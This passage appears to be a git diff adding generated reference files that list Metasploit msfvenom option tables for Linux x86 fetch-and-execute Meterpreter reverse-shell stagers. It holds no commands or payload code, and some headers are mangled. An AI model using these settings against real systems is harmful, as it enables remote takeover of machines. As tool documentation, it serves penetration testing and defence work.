spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from an HTTP server. + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-x86-meterpreter-reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-http-x86-meterpreter-reverse_tcp.txt new file mode 100644 index 0000000..d6a142e --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-x86-meterpreter-reverse_tcp.txt @@ -0,0 +1,111 @@ + + Name: HTTP Fetch, Reverse TCP Stager + Module: payload/cmd/linux/http/x86/meterpreter/reverse_tcp + Platform: Linux, Linux + Arch: cmd +Needs Admin: No + Total size: 111 + +Evasion options for payload/cmd/linux/http/x86/meterpreter/reverse_tcp: +========================= + +apid7.com> + skape + egypt + tkmru + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME mQkdiabWbLN no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from an HTTP server. + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-x86-meterpreter-reverse_tcp_uuid.txt b/msfvenom/payload_options/cmd-linux-http-x86-meterpreter-reverse_tcp_uuid.txt new file mode 100644 index 0000000..44084d8 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-x86-meterpreter-reverse_tcp_uuid.txt @@ -0,0 +1,111 @@ + + Name: HTTP Fetch, Reverse TCP Stager + Module: payload/cmd/linux/http/x86/meterpreter/reverse_tcp_uuid + Platform: Linux, Linux + Arch: cmd +Needs Admin: No + Total size: 114 + Rank: +Evasion options for payload/cmd/linux/http/x86/meterpreter/reverse_tcp_uuid: +========================= + + + skape + egypt + OJ Reeves + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME xxwmAiFiLRgN no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from an HTTP server. + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-x86-meterpreter_reverse_http.txt b/msfvenom/payload_options/cmd-linux-http-x86-meterpreter_reverse_http.txt new file mode 100644 index 0000000..614657c --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-x86-meterpreter_reverse_http.txt @@ -0,0 +1,104 @@ + + Name: HTTP Fetch + Module: payload/cmd/linux/http/x86/meterpreter_reverse_http + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 111 + Rank: Normal + +Provided by: + +Evasion options for payload/cmd/linux/http/x86/meterpreter_reverse_http: +========================= + +ent_cook@rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8080 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME TAuAEjPwQHq no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from an HTTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (iPad; CPU OS 17_7_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Mobile/15E148 Safari/604.1 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-x86-meterpreter_reverse_https.txt b/msfvenom/payload_options/cmd-linux-http-x86-meterpreter_reverse_https.txt new file mode 100644 index 0000000..e9a0fa0 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-x86-meterpreter_reverse_https.txt @@ -0,0 +1,106 @@ + + Name: HTTP Fetch + Module: payload/cmd/linux/http/x86/meterpreter_reverse_https + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 114 + Rank: Normal + +Provided by: + +Evasion options for payload/cmd/linux/http/x86/meterpreter_reverse_https: +========================= + +t_cook@rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8443 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME IrrBVfVSqoAJ no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from an HTTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-x86-meterpreter_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-http-x86-meterpreter_reverse_tcp.txt new file mode 100644 index 0000000..5b55dd1 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-x86-meterpreter_reverse_tcp.txt @@ -0,0 +1,97 @@ + + Name: HTTP Fetch + Module: payload/cmd/linux/http/x86/meterpreter_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 102 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Adam Cammack + Brent Cook + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME owvsLrgs no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from an HTTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no 